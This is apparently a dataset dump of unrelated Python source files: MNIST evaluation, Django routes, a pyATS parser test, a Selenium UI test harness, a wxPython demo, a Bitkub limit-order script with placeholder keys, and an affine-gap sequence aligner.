cm.max()/ 2.\r\n \r\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\r\n plt.text(j, i, cm[i, j],\r\n horizontalalignment = \"center\",\r\n color = \"white\" if cm[i, j] > thresh else \"black\")\r\n \r\n plt.tight_layout()\r\n plt.ylabel(\"True label\")\r\n plt.xlabel(\"Predicted label\")\r\n \r\n# predict the values from the validation dataset\r\nY_pred = model.predict(X_val)\r\n# convert predictions classes to one hot vectors\r\n# get index of the highest probability \r\nY_pred_classes = np.argmax(Y_pred, axis = 1)\r\n# convert validation observations to one hot vectors\r\nY_true = np.argmax(Y_val, axis=1)\r\n\r\n# compute the confusion matrix\r\nconfusion_mtx = confusion_matrix(Y_true, Y_pred_classes)\r\n# plot the confusion matrix\r\nplot_confusion_matrix(confusion_mtx, classes = range(10))\r\n\r\n#############################\r\n## 5. ERROR INVESTIGATION ##\r\n#############################\r\nerrors = (Y_pred_classes - Y_true != 0)\r\nY_pred_classes_errors = Y_pred_classes[errors]\r\nY_pred_errors = Y_pred[errors]\r\nY_true_errors = Y_true[errors]\r\nX_val_errors = X_val[errors]\r\n\r\ndef display_errors(errors_index, img_errors, pred_errors, obs_errors):\r\n n = 0\r\n nrows = 2\r\n ncols = 3\r\n fig, ax = plt.subplots(nrows, ncols, sharex=True, sharey=True)\r\n for row in range(nrows):\r\n for col in range(ncols):\r\n error = errors_index[n]\r\n ax[row, col].imshow((img_errors[error]).reshape((28,28)))\r\n ax[row, col].set_title(\"Predicted label: {}\\nTrue label :{}\".format(pred_errors[error],\r\n obs_errors[error]))\r\n n += 1\r\n \r\n# probabilities of the wrong predicted numbers\r\nY_pred_errors_prob = np.max(Y_pred_errors, axis=1)\r\n\r\n# predicted probabilities of the true values in the error set\r\ntrue_prob_errors = np.diagonal(np.take(Y_pred_errors, Y_true_errors, axis=1))\r\n\r\n# difference between the probabilities of the predicted label and the true label\r\ndelta_pred_true_errors = Y_pred_errors_prob - true_prob_errors\r\n\r\n# sorted list of the delta prob errors\r\nsorted_delta_errors = np.argsort(delta_pred_true_errors)\r\n\r\n# top 6 errors\r\nmost_important_errors = sorted_delta_errors[-6:]\r\n\r\n# show the top 6 errors\r\ndisplay_errors(most_important_errors, X_val_errors, Y_pred_classes_errors, Y_true_errors)\r\n\r\n#####################\r\n## 6. 
PREDICTION ##\r\n#####################\r\nresults = model.predict(test)\r\nresults = np.argmax(results, axis=1)\r\nresults = pd.Series(results, name=\"Label\")\r\n\r\n#####################\r\n## 7. SUBMISSION ##\r\n#####################\r\nsubmission = pd.concat([pd.Series(range(1, 28001), name = \"ImageId\"), results],\r\n axis=1)\r\n\r\nsubmission.to_csv(\"C:\\\\Users\\\\joann\\\\OneDrive\\\\Desktop\\\\My Files\\\\Data Science\\\\Digit Recognizer MNIST\\\\submission.csv\", index=False)","sub_path":"digit_recognizer.py","file_name":"digit_recognizer.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"215186955","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r\"^$\", views.friends, name=\"invitations\"),\n url(r\"^contacts/$\", views.contacts, name=\"invitations_contacts\"),\n url(r\"^accept/(\\w+)/$\", views.accept_join, name=\"friends_accept_join\"),\n url(r\"^invite/$\", views.invite, name=\"invite_to_join\"),\n]\n","sub_path":"apps/friends_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"194742503","text":"# Python\r\nimport re\r\nimport unittest\r\nfrom unittest.mock import Mock\r\n\r\n# ATS\r\nfrom pyats.topology import Device\r\n\r\n# Metaparser\r\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\r\n\r\n# Parser\r\nfrom genie.libs.parser.linux.ps import Ps\r\n \r\n\r\n# ===============\r\n# Unit tests for:\r\n# 'ps -ef'\r\n# ===============\r\nclass TestPs(unittest.TestCase):\r\n device = Device(name='aDevice')\r\n empty_output = {'execute.return_value': ''}\r\n \r\n golden_parsed_output = {\r\n 'pid': {\r\n '1': {\r\n 'uid': 'root',\r\n 'ppid': '0',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:03:36',\r\n 'cmd': '/sbin/init'\r\n },\r\n '2': {\r\n 'uid': 'root',\r\n 'ppid': '0',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:00:07',\r\n 'cmd': '[kthreadd]'\r\n },\r\n '1774': {\r\n 'uid': 'root',\r\n 'ppid': '1730',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:00:00',\r\n 'cmd': 'hald-addon-input: Listening on /dev/input/event2 /dev/input/event0'\r\n },\r\n '1781': {\r\n 'uid': '68',\r\n 'ppid': '1730',\r\n 'c': '0',\r\n 'stime': '2019',\r\n 'tty': '?',\r\n 'time': '00:00:00',\r\n 'cmd': 'hald-addon-acpi: listening on acpid socket /var/run/acpid.socket'\r\n }\r\n }\r\n }\r\n\r\n golden_output = {'execute.return_value': '''\r\n UID PID PPID C STIME TTY TIME CMD \r\n root 1 0 0 2019 ? 00:03:36 /sbin/init\r\n root 2 0 0 2019 ? 00:00:07 [kthreadd] \r\n root 1774 1730 0 2019 ? 00:00:00 hald-addon-input: Listening on /dev/input/event2 /dev/input/event0 \r\n 68 1781 1730 0 2019 ? 
00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket\r\n    '''}\r\n\r\n    def test_ps_golden(self):\r\n        self.maxDiff = None\r\n        self.device = Mock(**self.golden_output)\r\n        obj = Ps(device=self.device)\r\n        parsed_output = obj.parse()\r\n        self.assertEqual(parsed_output, self.golden_parsed_output)\r\n\r\n    def test_ps_empty(self):\r\n        self.maxDiff = None\r\n        self.device = Mock(**self.empty_output)\r\n        obj = Ps(device=self.device)\r\n        parsed_output = obj.parse()\r\n        self.assertEqual(parsed_output, {'pid': {}})\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n","sub_path":"src/genie/libs/parser/linux/tests/test_ps.py","file_name":"test_ps.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"196557875","text":"from climatology import Streamlines, Velocities\nfrom matplotlib import cm\nimport matplotlib\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# Script for making animations of velocity fields\n\n# Getting data file\ndata = np.genfromtxt('evol_field.dat', delimiter='')\n\n# Some animation settings\nstart = 0 # Index of starting frame\nend = int(3.e2) # Index of ending frame\ninterval = 0.1 # Delay between animation frames in seconds\nstep = 1 # Index step between frames\n\n# Save Location\ncwd = os.getcwd()\nsave = cwd\n\n# Spatial resolution of animations\nnx = 35\nny = 30\n\n# Run dimensions\nams_dim = [6, 6]\noms_dim = [6, 6]\n\ntestVelocities = Velocities(data, ams_dim, oms_dim) # Animation object\n\n# 250 hPa Wind field animations\nif (sys.argv[1] == '3'): # Input specified in PBS script\n    ugrid = testVelocities.u_grid('phi250', nx, ny, 0, end)\n    vgrid = testVelocities.v_grid('phi250', nx, ny, 0, end)\n    testVelocities.wind_field('phi250', ugrid, vgrid, 0, end, step=step, interval=interval, dimensions=True, datapath=save)\n\n# 750 hPa Velocities\nelif (sys.argv[1] == '2'):\n    ugrid = testVelocities.u_grid('phi750', nx, ny, 0, end)\n    vgrid = testVelocities.v_grid('phi750', nx, ny, 0, end)\n    testVelocities.wind_field('phi750', ugrid, vgrid, 0, end, step=step, interval=interval, dimensions=True, datapath=save)\n\n# Ocean velocities\nelif (sys.argv[1] == '1'):\n    ugrid = testVelocities.u_grid('phiOcean', nx, ny, 0, end)\n    vgrid = testVelocities.v_grid('phiOcean', nx, ny, 0, end)\n    testVelocities.wind_field('phiOcean', ugrid, vgrid, 0, end, step=step, interval=interval, dimensions=True, datapath=save)\n\nelse:\n    print('No field input for wind field script.')\n","sub_path":"Post-process/wind-field-animations.py","file_name":"wind-field-animations.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"358083683","text":"\"\"\"\nAuthor : Robin Singh\nImplementation Of Naive Pattern Matching Algorithm\n\n\"\"\"\ndef BF(pattern, string1):\n    index = []\n    # only try start positions where the pattern still fits inside the text\n    for i in range(len(string1) - len(pattern) + 1):\n        j = 0\n        while (j < len(pattern)):\n            if (string1[i + j] != pattern[j]):\n                break\n            j += 1\n\n        if (j == len(pattern)):\n            index.append(i)\n    return index\nif __name__ == '__main__':\n    l1 = BF(\"in\", \"robin singh\")\n    for i in range(len(l1)):\n        print(f\"Found At Index : {l1[i]}\")\n\n\n\n\n","sub_path":"Algorithms/String Matching 
Algorithm/Naive_method.py","file_name":"Naive_method.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"318908761","text":"import random\nnumCol =4\nnumRow =4\n\nidx = [x for x in range (6)]\nrandIdx = []\nfor col in range (6):\n temp = random.randint(1,6)\n while temp in randIdx:\n temp = random.randint(1,6)\n randIdx.append(temp)\nboard = list(zip(idx, randIdx)) \nfor a in board:\n print (a) \n\nprint(\"SWAP\")\n\nnewBoard=[]\nidx2 = [x for x in range (6)]\nboard[0], board[1] = board[1], board[0]\nfor elem in board:\n newBoard.append(elem[1])\n\nfor a in list(zip(idx2, newBoard)):\n print (a)\n ","sub_path":"making_game_with_python/slide puzzle/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"106500776","text":"\"\"\"patients table\n\nRevision ID: d8990642ff3a\nRevises: b9c9cd698a49\nCreate Date: 2022-10-08 17:56:41.857118\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd8990642ff3a'\ndown_revision = 'b9c9cd698a49'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('patient',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('firstname', sa.String(length=64), nullable=True),\n sa.Column('lastname', sa.String(length=64), nullable=True),\n sa.Column('dob', sa.DateTime(), nullable=True),\n sa.Column('sex', sa.String(length=64), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_index('ix_user_email', table_name='user')\n op.drop_index('ix_user_username', table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('user',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('username', sa.VARCHAR(length=64), autoincrement=False, nullable=True),\n sa.Column('email', sa.VARCHAR(length=120), autoincrement=False, nullable=True),\n sa.Column('password_hash', sa.VARCHAR(length=128), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id', name='user_pkey')\n )\n op.create_index('ix_user_username', 'user', ['username'], unique=False)\n op.create_index('ix_user_email', 'user', ['email'], unique=False)\n op.drop_table('patient')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/d8990642ff3a_patients_table.py","file_name":"d8990642ff3a_patients_table.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"441679776","text":"import logger\nimport time\nimport unittest\nimport os\nimport urllib2\nimport commands\nimport types\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support.ui import WebDriverWait, Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom threading import Thread\nimport ConfigParser\nfrom TestInput import TestInputSingleton,TestInputParser, TestInputServer\nfrom couchbase_helper.cluster import Cluster\nfrom remote.remote_util import RemoteMachineShellConnection\nfrom membase.api.rest_client import RestConnection\nfrom membase.helper.bucket_helper import BucketOperationHelper\nfrom membase.helper.cluster_helper import ClusterOperationHelper\n\n\nclass BaseUITestCase(unittest.TestCase):\n # selenium thread\n\n def _start_selenium(self):\n host = self.machine.ip\n if host in ['localhost', '127.0.0.1']:\n os.system(\"java -jar %sselenium-server-standalone*.jar -Dwebdriver.chrome.driver=%s > selenium.log 2>&1\"\n % (self.input.ui_conf['selenium_path'], self.input.ui_conf['chrome_path']))\n else:\n self.shell.execute_command('{0}start-selenium.bat > {0}selenium.log 2>&1 &'.format(self.input.ui_conf['selenium_path']))\n\n def _kill_old_drivers(self):\n if self.shell.extract_remote_info().type.lower() == 'windows':\n self.shell.execute_command('taskkill /F /IM chromedriver.exe')\n self.shell.execute_command('taskkill /F /IM chrome.exe')\n\n def _wait_for_selenium_is_started(self, timeout=10):\n if self.machine.ip in ['localhost', '127.0.0.1']:\n start_time = time.time()\n while (time.time() - start_time) < timeout:\n log = open(\"/tmp/selenium.log\")\n if log.read().find('Started org.openqa.jetty.jetty.Server') > -1:\n log.close()\n if self._is_selenium_running():\n time.sleep(1)\n return\n time.sleep(1)\n else:\n time.sleep(timeout)\n\n def _start_selenium_thread(self):\n self.t = Thread(target=self._start_selenium,\n name=\"selenium\",\n args=())\n self.t.start()\n\n def _is_selenium_running(self):\n host = self.machine.ip\n if host in ['localhost', '127.0.0.1']:\n cmd = 'ps -ef|grep selenium-server'\n output = commands.getstatusoutput(cmd)\n if str(output).find('selenium-server-standalone') > -1:\n return True\n else:\n #cmd = \"ssh {0}@{1} 'bash -s' < 'tasklist |grep selenium-server'\".format(self.input.servers[0].ssh_username,\n # host)\n cmd = 'tasklist |grep java'\n o, r = self.shell.execute_command(cmd)\n #cmd = \"ssh {0}@{1} 'bash -s' < 'ps -ef|grep selenium-server'\"\n if 
str(o).find('java') > -1:\n return True\n return False\n\n def setUp(self):\n try:\n self.log = logger.Logger.get_logger()\n self.input = TestInputSingleton.input\n self.servers = self.input.servers\n self.browser = self.input.ui_conf['browser']\n self.replica = self.input.param(\"replica\", 1)\n self.case_number = self.input.param(\"case_number\", 0)\n self.cluster = Cluster()\n self.machine = self.input.ui_conf['server']\n self.driver = None\n self.shell = RemoteMachineShellConnection(self.machine)\n #avoid clean up if the previous test has been tear down\n if not self.input.param(\"skip_cleanup\", True) \\\n or self.case_number == 1:\n self.tearDown()\n self._log_start(self)\n self._kill_old_drivers()\n #thread for selenium server\n if not self._is_selenium_running():\n self.log.info('start selenium')\n self._start_selenium_thread()\n self._wait_for_selenium_is_started()\n self.log.info('start selenium session')\n if self.browser == 'ff':\n self.driver = webdriver.Remote(command_executor='http://{0}:{1}/wd/hub'\n .format(self.machine.ip,\n self.machine.port),\n desired_capabilities=DesiredCapabilities.FIREFOX)\n elif self.browser == 'chrome':\n self.driver = webdriver.Remote(command_executor='http://{0}:{1}/wd/hub'\n .format(self.machine.ip,\n self.machine.port),\n desired_capabilities=DesiredCapabilities.CHROME)\n self.log.info('start selenium started')\n self.driver.get(\"http://{0}:{1}\".format(self.servers[0].ip,\n self.servers[0].port))\n self.driver.maximize_window()\n except Exception as ex:\n self.input.test_params[\"stop-on-failure\"] = True\n self.log.error(\"SETUP WAS FAILED. ALL TESTS WILL BE SKIPPED\")\n self.fail(ex)\n\n @staticmethod\n def _log_start(self):\n try:\n msg = \"{0} : {1} started \".format(datetime.datetime.now(),\n self._testMethodName)\n RestConnection(self.servers[0]).log_client_error(msg)\n except:\n pass\n\n @staticmethod\n def _log_finish(self):\n try:\n msg = \"{0} : {1} finished \".format(datetime.datetime.now(),\n self._testMethodName)\n RestConnection(self.servers[0]).log_client_error(msg)\n except:\n pass\n\n def tearDown(self):\n try:\n if self.driver:\n path_screen = self.input.ui_conf['screenshots'] or 'logs/screens'\n full_path = '{1}/screen_{0}.png'.format(time.time(), path_screen)\n self.log.info('screenshot is available: %s' % full_path)\n if not os.path.exists(path_screen):\n os.mkdir(path_screen)\n self.driver.get_screenshot_as_file(os.path.abspath(full_path))\n rest = RestConnection(self.servers[0])\n if rest._rebalance_progress_status() == 'running':\n stopped = rest.stop_rebalance()\n self.assertTrue(stopped, msg=\"unable to stop rebalance\")\n BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)\n for server in self.servers:\n ClusterOperationHelper.cleanup_cluster([server])\n ClusterOperationHelper.wait_for_ns_servers_or_assert(self.servers, self)\n if self.driver:\n self.driver.close()\n except Exception as e:\n raise e\n finally:\n if self.driver:\n self.shell.disconnect()\n self.cluster.shutdown()\n\nclass Control():\n def __init__(self, selenium, by=None, web_element=None):\n self.selenium = selenium\n self.by = by\n if by:\n try:\n self.web_element = self.selenium.find_element_by_xpath(by)\n self.present = True\n if self.web_element is None:\n self.present = False\n except NoSuchElementException as ex:\n self.present = False\n else:\n self.web_element = web_element\n self.present = True\n\n def highlightElement(self):\n if self.by:\n 
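# evaluate the stored XPath in the browser and give the first matching node a yellow background\r\n            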
self.selenium.execute_script(\"document.evaluate(\\\"{0}\\\",document,null,XPathResult.ANY_TYPE, null).iterateNext().setAttribute('style','background-color:yellow');\".format(self.by))\n\n def type_native(self, text):\n ActionChains(self.selenium).click(self.web_element).perform()\n ActionChains(self.selenium).key_down(Keys.CONTROL).perform()\n ActionChains(self.selenium).send_keys('a').perform()\n ActionChains(self.selenium).key_up(Keys.CONTROL).perform()\n ActionChains(self.selenium).send_keys(Keys.DELETE).perform()\n ActionChains(self.selenium).send_keys(text).perform()\n\n def click(self):\n self.highlightElement()\n self.web_element.click()\n\n def type(self, message):\n if message:\n self.highlightElement()\n self.web_element.clear()\n if type(message) == types.StringType and message.find('\\\\') > -1:\n for symb in list(message):\n if symb == '\\\\':\n self.web_element.send_keys(Keys.DIVIDE)\n else:\n self.web_element.send_keys(symb)\n else:\n self.web_element.send_keys(message)\n\n def check(self, setTrue=True):\n if setTrue:\n if not self.is_checked():\n self.click()\n else:\n if self.is_checked():\n self.click()\n\n def is_present(self):\n return self.present\n\n def is_displayed(self):\n return self.present and self.web_element.is_displayed()\n\n def is_checked(self):\n checked = self.web_element.get_attribute(\"checked\")\n return checked is not None\n\n def get_text(self):\n self.highlightElement()\n return self.web_element.text\n\n def get_attribute(self, atr):\n return self.web_element.get_attribute(atr)\n\n def select(self, label):\n element = Select(self.web_element)\n element.select_by_visible_text(label)\n\n def mouse_over(self):\n ActionChains(self.selenium).move_to_element(self.web_element).perform()\n\n def get_inner_html(self):\n return self.web_element.get_attribute(\"outerHTML\")\n\nclass ControlsHelper():\n def __init__(self, driver):\n self.driver = driver\n file = \"pytests/ui/uilocators.conf\"\n config = ConfigParser.ConfigParser()\n config.read(file)\n self.locators = config\n\n def find_control(self, section, locator, parent_locator=None, text=None):\n by = self._find_by(section, locator, parent_locator)\n if text:\n by = by.format(text)\n return Control(self.driver, by=by)\n\n def find_controls(self, section, locator, parent_locator=None):\n by = self._find_by(section, locator, parent_locator)\n controls = []\n elements = self.driver.find_elements_by_xpath(by)\n for element in elements:\n controls.append(Control(self.driver, web_element=element))\n return controls\n\n def find_first_visible(self, section, locator, parent_locator=None, text=None):\n by = self._find_by(section, locator, parent_locator)\n if text:\n by = by.format(text)\n controls = []\n elements = self.driver.find_elements_by_xpath(by)\n for element in elements:\n try:\n if element.is_displayed():\n return Control(self.driver, web_element=element)\n except StaleElementReferenceException:\n pass\n return None\n\n def _find_by(self, section, locator, parent_locator=None):\n if parent_locator:\n return self.locators.get(section, parent_locator) + \\\n self.locators.get(section, locator)\n else:\n return self.locators.get(section, locator)\n\nclass BaseHelperControls():\n def __init__(self, driver):\n helper = ControlsHelper(driver)\n self._user_field = helper.find_control('login', 'user_field')\n self._user_password = helper.find_control('login', 'password_field')\n self._login_btn = helper.find_control('login', 'login_btn')\n self._logout_btn = helper.find_control('login', 'logout_btn')\n 
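# each ('login', <name>) pair resolves to an xpath defined in pytests/ui/uilocators.conf\r\n        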
self.error = helper.find_control('login', 'error')\r\n\r\nclass BaseHelper():\r\n    def __init__(self, tc):\r\n        self.tc = tc\r\n        self.controls = BaseHelperControls(tc.driver)\r\n\r\n    def login(self, user=None, password=None):\r\n        self.tc.log.info(\"Try to login to application\")\r\n        if not user:\r\n            user = self.tc.input.membase_settings.rest_username\r\n        if not password:\r\n            password = self.tc.input.membase_settings.rest_password\r\n        self.controls._user_field.type(user)\r\n        self.controls._user_password.type(password)\r\n        self.controls._login_btn.click()\r\n        self.tc.log.info(\"user %s is logged in\" % user)\r\n\r\n    def logout(self):\r\n        self.tc.log.info(\"Try to logout\")\r\n        self.controls._logout_btn.click()\r\n        time.sleep(3)\r\n        self.tc.log.info(\"You are logged out\")\r\n","sub_path":"testrunner/pytests/ui/uibasetest.py","file_name":"uibasetest.py","file_ext":"py","file_size_in_byte":12937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"218361079","text":"# -*- coding:utf-8 -*-\n# file: wxPythonPopupMenu.py\n#\nimport wx\t\t\t\t\t\t# import wxPython\nclass MyApp(wx.App):\t\t\t\t\t# create the application class by inheritance\n\tdef OnInit(self):\t\t\t\t# override the OnInit method\n\t\tframe = wx.Frame(parent = None,title = 'wxPython',size = (300,170))\t\t# create the frame window\n\t\tself.panel = wx.Panel(frame, -1)\t\t# create the panel\n\t\tmenuBar = wx.MenuBar()\t\t\t\t# create the menu bar\n\t\tself.menu = wx.Menu()\t\t\t\t# create the menu\n\t\topen = self.menu.Append(-1, 'Open')\n\t\tsave = self.menu.Append(-1, 'Save')\n\t\tself.menu.AppendSeparator()\t\n\t\tclose = self.menu.Append(-1, 'Close')\n\t\tmenuBar.Append(self.menu, '&File')\n\t\tframe.SetMenuBar(menuBar)\t\t\t# add the menu bar to the frame window\n\t\tself.Bind(wx.EVT_RIGHT_DOWN, self.OnRClick)\t# bind the right-click event\n\t\tframe.Show()\n\t\treturn True\n\tdef OnRClick(self, event):\n\t\tpos = (event.GetX(),event.GetY())\t\t# get the mouse click coordinates\n\t\tself.panel.PopupMenu(self.menu, pos)\t\t# show the popup menu\napp = MyApp()\napp.MainLoop()\n","sub_path":"Python/PYTHON source code/第13章/wxPythonPopupMenu.py","file_name":"wxPythonPopupMenu.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"608135287","text":"apikey = 'afadaasafsdfasdfafadaasafsdfasdf' \r\napisecret = b'afadaasafsdfasdfafadaasafsdfasdf'\r\n\r\n# API KEY and API SECRET are taken from this link: https://www.bitkub.com/publicapi\r\n# do not remove the b prefix in front of the apisecret value\r\n\r\nimport hashlib\r\nimport hmac\r\nimport json\r\nimport requests\r\n\r\n\r\n# API info\r\nAPI_HOST = 'https://api.bitkub.com'\r\nAPI_KEY = apikey\r\nAPI_SECRET = apisecret\r\n\r\ndef json_encode(data):\r\n\treturn json.dumps(data, separators=(',', ':'), sort_keys=True)\r\n\r\ndef sign(data):\r\n\tj = json_encode(data)\r\n\tprint('Signing payload: ' + j)\r\n\th = hmac.new(API_SECRET, msg=j.encode(), digestmod=hashlib.sha256)\r\n\treturn h.hexdigest()\r\n\r\n# check server time\r\nresponse = requests.get(API_HOST + '/api/servertime')\r\nts = int(response.text)\r\nprint('Server time: ' + response.text)\r\n\r\n# place ask\r\nheader = {\r\n\t'Accept': 'application/json',\r\n\t'Content-Type': 'application/json',\r\n\t'X-BTK-APIKEY': API_KEY,\r\n}\r\ndata = {\r\n\t'sym': 'THB_DOGE',\r\n\t'amt': 100, # amount you want to sell\r\n\t'rat': 0.27,\r\n\t'typ': 'limit',\r\n\t'ts': ts,\r\n}\r\nsignature = sign(data)\r\ndata['sig'] = signature\r\n\r\nprint('Payload with signature: ' + json_encode(data))\r\nresponse = requests.post(API_HOST + '/api/market/place-ask', headers=header, 
data=json_encode(data))\r\n\r\n\r\nprint('Response: ' + response.text)","sub_path":"bitkubsell.py","file_name":"bitkubsell.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
{"seq_id":"572613848","text":"import numpy as np\n\n# Idea from:\n    # https://www.cs.cmu.edu/~ckingsf/bioinfo-lectures/gaps.pdf\n    # https://www.cs.cmu.edu/~02710/Lectures/SeqAlign2015.pdf\n    # https://www.cs.cmu.edu/~ckingsf/bioinfo-lectures/local.pdf\n\n# 3 scoring matrices keep track of gap openings and penalties\n# M stores the score of best alignment ending in a match\n# X stores the score of best alignment ending with gap in the first sequence\n# Y stores the score of best alignment ending with gap in the second sequence\n\n# Initialize empty scoring matrices \ndef make_matrices(dimA,dimB, gap_start, gap_extend):\n    # Initialize empty matrices\n    M = np.zeros((dimA, dimB))\n    X = np.zeros((dimA, dimB))\n    Y = np.zeros((dimA, dimB))\n    # Introduce gap penalties on starting positions\n    for i in range(1, dimA):\n        M[i][0] = float(\"-inf\")\n        X[i][0] = float(\"-inf\")\n        Y[i][0] = gap_start + (i * gap_extend)\n    for j in range(1, dimB):\n        M[0][j] = float(\"-inf\")\n        X[0][j] = gap_start + (j * gap_extend)\n        Y[0][j] = float(\"-inf\")\n    return M, X, Y\n\n# Fill all three matrices starting from top left corners\ndef score_matrix(seqA, seqB, similarityM, similarityS, gap_start, gap_extend):\n    dimA = len(seqA) + 1\n    dimB = len(seqB) + 1\n    M, X, Y = make_matrices(dimB,dimA, gap_start, gap_extend)\n    for j in range(1, dimA):\n        for i in range(1, dimB):\n            # get matching score from similarity matrix\n            similarity = similarityM[similarityS.index(seqB[i-1])][similarityS.index(seqA[j-1])]\n            # score of best alignment of x[1..i] and y[1..j] ending with a space in X\n            X[i][j] = max((gap_start + gap_extend + M[i][j-1]), \n                          (gap_extend + X[i][j-1]), \n                          (gap_start + gap_extend + Y[i][j-1]))\n            # score of best alignment of x[1..i] and y[1..j] ending with a space in Y\n            Y[i][j] = max((gap_start + gap_extend + M[i-1][j]), \n                          (gap_start + gap_extend + X[i-1][j]), \n                          (gap_extend + Y[i-1][j]))\n            # score of best alignment of x[1..i] and y[1..j] ending with a match\n            M[i][j] = max(similarity + M[i-1][j-1], \n                          X[i][j], \n                          Y[i][j])\n    return X, Y, M\n\n# Find the best path through the matrices starting at the bottom right corner\ndef backtrace(seqA, seqB, X, Y, M, similarityM, similarityS):\n    finalA = \"\"\n    finalB = \"\"\n    i,j = len(seqB), len(seqA)\n    while (i > 0 or j > 0):\n        # Get match scores\n        similarity = similarityM[similarityS.index(seqB[i-1])][similarityS.index(seqA[j-1])]\n        # the position was a match, continue on the diagonal of the matrix M\n        if (i > 0 and j > 0 and M[i][j] == M[i-1][j-1] + similarity):\n            finalA = seqA[j-1] + finalA\n            finalB = seqB[i-1] + finalB\n            i -= 1 \n            j -= 1\n        # the position was a gap, continue in Y\n        elif (i > 0 and M[i][j] == Y[i][j]):\n            finalA = \"-\" + finalA\n            finalB = seqB[i-1] + finalB\n            i -= 1\n        # the position was a gap, continue in X\n        else: # (j > 0 and M[i][j] == X[i][j])\n            finalA = seqA[j-1] + finalA\n            finalB = \"-\" + finalB\n            j -= 1\n    return finalA, finalB\n\n\n# perform affine gap alignment \ndef align_sequences(seqA, seqB, similarityM, similarityS, gap_start, gap_extend):\n    X, Y, M = score_matrix(seqA, seqB, similarityM, similarityS, gap_start, gap_extend)\n    finalA,finalB = backtrace(seqA, seqB, X, Y, M, similarityM, similarityS)\n    score = max(M[len(M)-1][len(M[0])-1], \n                X[len(X)-1][len(X[0])-1], \n                
Y[len(Y)-1][len(Y[0])-1])\n    return finalA, finalB, score\n\n# Given list of pairs, get alignment scores for set gap_start and gap_extend\ndef get_scores(base_path, pairL, gap_start, gap_extend, \n               similarityM, similarityS, normalize=False): \n    scores = [] \n    # convert the positive penalties to negative scores once, for all pairs\n    gap_start = gap_start*-1\n    gap_extend = gap_extend*-1\n    for pair in pairL:\n        positiveA, positiveB = pair\n        seqA = read_fasta(base_path+positiveA)\n        seqB = read_fasta(base_path+positiveB)\n        alignedA, alignedB, score = align_sequences(seqA, seqB, similarityM, \n                                                    similarityS, gap_start, gap_extend)\n        if (normalize):\n            score = score/min(len(seqA), len(seqB))\n        scores.append(score)\n    return scores\n\n\n","sub_path":"hw3_code/align.py","file_name":"align.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"}
